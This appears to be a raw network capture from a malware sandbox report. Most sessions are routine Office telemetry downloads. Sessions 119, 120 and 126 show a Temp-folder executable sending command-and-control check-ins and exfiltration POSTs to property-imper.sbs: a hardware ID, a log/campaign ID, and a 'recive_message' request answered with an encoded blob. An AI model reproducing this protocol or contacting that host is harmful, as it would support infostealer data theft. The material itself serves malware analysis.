6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	49883	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:45 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:46 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:46 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: c7391ddf-401e-0064-3568-3b54af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193646Z-174c587ffdfdwxdvhC1TEB1c4n00000001vg000000006nf9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:46 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	49884	172.67.162.84	443	7288	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:46 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: property-imper.sbs
2024-11-22 19:36:46 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-22 19:36:47 UTC	1009	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7hg86gsojmplgjl2sd17nmvmck; expires=Tue, 18-Mar-2025 13:23:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1g5MJsBkh6pClQOdU3Husn1e7VJgEFaxEgJ6gPnGcSw1XohYXl1Zgbe8SKIz09%2FuddzhGN7Q6lcse6HMLUCypBUiQsm76Edo6VyURgeM0BdaB9LsZwvjGQBmXWyr2WpKx6vIDe4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6b5ecd0fbcc3ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1517&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1820448&cwnd=245&unsent_bytes=0&cid=9a76a5c74dd19f50&ts=890&x=0"
2024-11-22 19:36:47 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-22 19:36:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	49885	172.67.162.84	443	6588	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:46 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HVT7ICGBP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1241 Host: property-imper.sbs
2024-11-22 19:36:46 UTC	1241	OUT	Data Raw: 2d 2d 48 56 54 37 49 43 47 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 30 30 43 34 30 32 30 34 33 36 39 42 41 31 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 48 56 54 37 49 43 47 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 56 54 37 49 43 47 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 56 54 37 49 43 47 42 50 0d 0a 43 6f 6e 74 65 6e Data Ascii: --HVT7ICGBPContent-Disposition: form-data; name="hwid"CF00C40204369BA1D7CBBD6DF28D3732--HVT7ICGBPContent-Disposition: form-data; name="pid"1--HVT7ICGBPContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--HVT7ICGBPConten
2024-11-22 19:36:47 UTC	1014	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qs8v9o12n4ua0j0v2sa6va0bi5; expires=Tue, 18-Mar-2025 13:23:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CMgpoQ5h6upPO5E5%2BwKobEXCPNAXJN26VYI61lQZZ6sbilxNAoJ71t%2FP2BWm2exVpPWFa2kIVgXh%2BQsgXoUQcsi5K3QsMFeQKGFDqSIzTpBuATnAGA4VxVNv3vmivOcNK43Abnk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6b5ece3f8a42db-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1892&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2151&delivery_rate=1509824&cwnd=228&unsent_bytes=0&cid=4ba42e1bf5700a99&ts=817&x=0"
2024-11-22 19:36:47 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 19:36:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	49888	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:47 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:48 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:48 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: 119e228c-001e-0046-1663-3bda4b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193648Z-178bfbc474bwlrhlhC1NYCy3kg00000003dg00000000d7e3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:48 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49889	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:48 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:48 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:48 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: e8f84e55-c01e-0079-2269-3be51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193648Z-178bfbc474bp8mkvhC1NYCzqnn000000037g00000000exxy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:48 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	49887	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:48 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:48 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:48 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: 23c3770b-601e-0084-293a-3c6b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193648Z-178bfbc474bp8mkvhC1NYCzqnn00000003b0000000002c8p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:48 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	49890	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:48 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:48 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:48 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: 2537c9bf-601e-0050-536a-3c2c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193648Z-174c587ffdftjz9shC1TEBsh9800000001n000000000t4rd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:48 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	49891	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:48 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:48 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:48 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: 5c785bae-401e-0083-638c-3a075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193648Z-178bfbc474bp8mkvhC1NYCzqnn000000035000000000sqgy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:48 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	49893	172.67.162.84	443	7288	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:48 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: property-imper.sbs
2024-11-22 19:36:48 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-11-22 19:36:50 UTC	1018	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9gnbep25a9sb06f0d2huc3re2v; expires=Tue, 18-Mar-2025 13:23:28 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LnDo3dEKdOh86Hy4X5OYBI3qZCCMcZu%2B0ZPx6J%2BoXXzX%2BHx%2B0jgQpi0NwB9RwFHWJbE1RZNmZE4zl9VQ01fMA8SPAYVbfzije4VNeKPNT%2B1TiZPkeaQCdg12keZBAgLUB4pTJ5M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6b5edb49a4c466-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1531&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=955&delivery_rate=1828428&cwnd=227&unsent_bytes=0&cid=8b831aaba6af3f0f&ts=1847&x=0"
2024-11-22 19:36:50 UTC	351	IN	Data Raw: 31 35 32 35 0d 0a 41 4b 78 2f 45 61 58 44 6d 5a 66 5a 57 31 78 50 38 55 6a 61 64 77 48 47 63 42 6d 43 6f 42 35 4a 35 2b 55 79 54 66 6a 48 66 4d 56 37 6a 67 6b 7a 6e 2f 65 31 74 61 6f 2b 66 6e 57 46 4f 71 38 53 4c 65 51 52 66 61 43 61 65 43 69 4c 6c 6c 64 68 32 72 45 52 35 7a 72 4b 48 6e 33 57 70 72 57 31 76 43 4e 2b 64 61 6f 7a 2b 42 4a 76 35 45 6f 37 35 38 70 38 4b 49 75 48 55 79 61 58 74 78 43 6d 61 4d 41 59 65 63 43 67 2f 66 61 31 4e 6a 6b 71 6c 43 6d 77 47 57 69 72 47 48 53 67 6a 44 77 73 6e 63 63 49 62 37 57 69 43 4b 52 4e 7a 51 78 36 68 37 36 31 37 50 73 2b 4d 6d 33 4c 61 72 73 53 59 36 6f 57 66 65 6e 49 64 69 47 44 68 6c 59 6e 69 4b 34 61 72 57 6a 4f 47 33 6a 4b 71 65 6e 37 76 7a 45 79 4c 4a 34 70 2b 46 73 6a 6f 77 6f 37 75 49 49 76 47 59 61 57 51 Data Ascii: 1525AKx/EaXDmZfZW1xP8UjadwHGcBmCoB5J5+UyTfjHfMV7jgkzn/e1tao+fnWFOq8SLeQRfaCaeCiLlldh2rER5zrKHn3WprW1vCN+daoz+BJv5Eo758p8KIuHUyaXtxCmaMAYecCg/fa1NjkqlCmwGWirGHSgjDwsnccIb7WiCKRNzQx6h7617Ps+Mm3LarsSY6oWfenIdiGDhlYniK4arWjOG3jKqen7vzEyLJ4p+Fsjowo7uIIvGYaWQ
2024-11-22 19:36:50 UTC	1369	IN	Data Raw: 33 33 47 72 50 76 6e 73 7a 49 31 4b 49 45 68 73 52 68 75 70 42 39 78 37 38 46 38 4c 49 2b 4e 58 79 57 65 71 42 4f 68 59 73 35 64 50 59 65 6d 34 37 58 6a 65 52 30 6f 67 79 32 30 41 79 47 65 55 6d 53 75 32 7a 77 73 69 63 63 49 62 35 4b 67 48 61 52 70 77 52 35 37 7a 4c 50 37 35 37 30 30 4f 7a 2b 56 4c 37 59 66 59 4c 59 59 64 65 62 42 64 53 43 4d 67 6c 63 72 32 75 74 65 6f 48 71 4f 52 54 50 6d 72 50 44 35 73 53 34 2b 62 59 78 6b 6f 56 56 6b 71 46 49 6a 6f 4d 5a 39 4c 34 53 44 58 69 47 65 71 52 69 70 62 38 45 62 65 63 65 6d 38 66 32 7a 4f 44 4d 6d 6e 43 71 39 47 47 65 69 48 6e 72 6c 67 6a 4a 72 67 70 38 51 64 39 71 4c 47 61 52 77 6a 43 68 77 79 61 2f 38 34 2f 73 6d 63 44 54 54 4c 62 52 56 4f 2b 51 63 66 75 2f 51 66 54 6d 41 69 55 49 6a 6e 36 4d 54 70 47 7a 4f Data Ascii: 33GrPvnszI1KIEhsRhupB9x78F8LI+NXyWeqBOhYs5dPYem47XjeR0ogy20AyGeUmSu2zwsiccIb5KgHaRpwR57zLP75700Oz+VL7YfYLYYdebBdSCMglcr2uteoHqORTPmrPD5sS4+bYxkoVVkqFIjoMZ9L4SDXiGeqRipb8Ebecem8f2zODMmnCq9GGeiHnrlgjJrgp8Qd9qLGaRwjChwya/84/smcDTTLbRVO+Qcfu/QfTmAiUIjn6MTpGzO
2024-11-22 19:36:50 UTC	1369	IN	Data Raw: 2f 38 34 2f 73 6d 63 44 54 54 4c 62 52 56 4f 2b 51 65 63 75 44 4a 64 69 2b 46 67 46 30 71 6d 61 49 64 71 6d 58 45 45 33 54 44 72 66 4c 34 76 54 6b 35 4b 5a 59 34 76 52 78 76 71 46 49 31 6f 4d 56 6b 61 39 33 48 66 79 69 4d 70 6a 47 6b 63 38 64 64 62 49 6d 34 75 2f 4b 33 65 57 5a 74 6c 43 2b 77 48 6d 57 73 45 6d 6e 6c 7a 48 63 71 6a 34 46 52 49 70 61 6a 48 71 5a 69 79 42 46 7a 77 4b 62 70 35 37 34 2f 4c 43 66 54 5a 50 67 53 65 2b 52 4b 4f 39 62 53 61 7a 71 54 78 57 55 73 6c 4b 73 5a 73 53 4c 52 55 32 71 48 70 76 65 31 34 33 6b 31 4c 5a 38 74 73 42 4e 6e 72 42 31 30 36 64 42 39 4a 34 75 56 56 79 2b 54 71 78 47 72 61 38 4d 61 66 73 79 72 39 76 47 38 4f 48 35 6a 30 79 32 67 56 54 76 6b 4a 47 76 74 7a 6c 49 67 69 59 34 51 4d 4e 53 38 58 71 42 75 6a 6b 55 7a 77 Data Ascii: /84/smcDTTLbRVO+QecuDJdi+FgF0qmaIdqmXEE3TDrfL4vTk5KZY4vRxvqFI1oMVka93HfyiMpjGkc8ddbIm4u/K3eWZtlC+wHmWsEmnlzHcqj4FRIpajHqZiyBFzwKbp574/LCfTZPgSe+RKO9bSazqTxWUslKsZsSLRU2qHpve143k1LZ8tsBNnrB106dB9J4uVVy+TqxGra8Mafsyr9vG8OH5j0y2gVTvkJGvtzlIgiY4QMNS8XqBujkUzw
